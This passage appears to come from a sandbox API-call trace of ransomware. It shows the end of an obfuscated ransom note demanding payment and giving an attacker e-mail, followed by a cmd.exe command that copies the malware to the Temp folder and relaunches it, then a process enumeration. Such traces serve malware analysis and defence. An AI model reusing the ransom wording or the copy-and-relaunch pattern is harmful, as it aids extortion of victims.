tic\\lang1049\\f0\\'e0\\lang1033\\f1 ll\\lang1049\\f0\\'f3\\lang1033\\f1 in\\lang1049\\f0\\'f1\\lang1033\\f1 r\\lang1049\\f0\\'e5\\'e0\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 d b\\lang1049\\f0\\'f3\\lang1033\\f1 100$!\\lang1049\\f0\\par\r\n\\cf0\\b0\\'c0ll th\\'e5 \\'e0tt\\'e5mpts \\'eef d\\'e5\\'f1rypti\\'een by y\\'eeurs\\'e5lf will r\\'e5sult \\'eenly in irr\\'e5v\\'ee\\'f1\\'e0ble l\\'eess \\'eef y\\'eeur d\\'e0t\\'e0.\\par\r\nIf y\\'eeu still w\\'e0nt t\\'ee try t\\'ee d\\'e5crypt th\\'e5m by y\\'eeurs\\'e5lf pl\\'e5\\'e0s\\'e5 m\\'e0k\\'e5 \\'e0 b\\'e0ckup \\'e0t first b\\'e5c\\'e0us\\'e5 
th\\'e5 d\\'e5\\'f1rypti\\'een will b\\'e5c\\'eem\\'e5 imp\\'eessibl\\'e5 in c\\'e0s\\'e5 \\'eef \\'e0ny ch\\'e0ng\\'e5s insid\\'e5 th\\'e5 fil\\'e5s.\\par\r\nIf y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il f\\'eer m\\'eer\\'e5 th\\lang1033\\f1 e\\lang1049\\f0 n \\lang1033\\f1 24\\lang1049\\f0 h\\lang1033\\f1 o\\lang1049\\f0 urs (\\'e0nd \\'eenly in this c\\'e0s\\'e5!), us\\'e5 th\\'e5 \\lang1033\\f1 r\\lang1049\\f0\\'e5\\lang1033\\f1 s\\lang1049\\f0\\'e5\\lang1033\\f1 rv\\lang1049\\f0\\'e5 \\'e5\\lang1033\\f1 -m\\lang1049\\f0\\'e0\\lang1033\\f1 il \\lang1049\\f0\\'e0\\lang1033\\f1 ddr\\lang1049\\f0\\'e5\\lang1033\\f1 ss\\lang1049\\f0 : \\par\r\n\\lang1033\\b\\f1\\fs28 decodedecode@yandex.ru\\lang1049\\f0\\fs32\\par\r\n\\par\r\n}\r\n \r\n", lpUsedDefaultChar=0x0) returned 5682 [0112.816] WriteFile (in: hFile=0xf4, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x1632, lpNumberOfBytesWritten=0x12fb44, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12fb44*=0x1632, lpOverlapped=0x0) returned 1 [0112.817] CloseHandle (hObject=0xf4) returned 1 [0112.818] GetCurrentThreadId () returned 0xaf0 [0112.818] GetCurrentThreadId () returned 0xaf0 [0112.818] GetCurrentThreadId () returned 0xaf0 [0112.818] GetTickCount () returned 0x2704f [0112.818] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc10 | out: lpPerformanceCount=0x12fc10*=16960736202) returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="w") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: 
lpWideCharStr="8") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="8") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="H") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="5") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="d") returned 1 [0112.818] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbec, cbMultiByte=1, lpWideCharStr=0x12ebd4, cchWideChar=2047 | out: lpWideCharStr="N") returned 1 [0112.818] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0112.819] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0112.819] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0112.819] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x14a8b5c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0112.819] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && 
\"[TO_PATH]\" [PARAMS]") returned 0x63 [0112.819] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0112.819] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\W588H5DN.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\W588H5DN.EXE\" [PARAMS]") returned 0xb1 [0112.819] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0112.819] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb2c*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb1c | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"", lpProcessInformation=0x12fb1c*(hProcess=0xf0, 
hThread=0xf4, dwProcessId=0xd94, dwThreadId=0xd98)) returned 1 [0112.825] CloseHandle (hObject=0xf0) returned 1 [0112.825] CloseHandle (hObject=0xf4) returned 1 [0112.825] Sleep (dwMilliseconds=0xfa) [0113.156] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xf8 [0113.162] Process32FirstW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0113.162] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0113.163] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0113.164] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.165] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0113.166] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0113.167] 
Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0113.167] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0113.168] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0113.169] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0113.170] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.171] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.172] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.173] 
Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.174] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.175] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0113.175] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.177] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.178] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0113.180] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.181] 
Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.183] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0113.184] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0113.186] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0113.359] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.360] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0113.361] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 
[0113.362] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0113.364] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0113.365] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0113.366] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0113.367] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0113.368] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0113.369] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="ins.exe")) returned 1 [0113.371] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0113.372] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0113.373] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0113.375] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0113.376] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0113.377] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0113.378] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0113.379] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0113.380] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0113.381] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0113.383] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0113.384] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0113.385] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0113.386] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0113.387] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0113.388] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0113.389] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.391] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0113.392] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.393] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0113.395] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, 
th32ParentProcessID=0xd5c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bkM66bYk.exe")) returned 1 [0113.396] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.397] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0113.399] Process32NextW (in: hSnapshot=0xf8, lppe=0x12f944 | out: lppe=0x12f944*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, 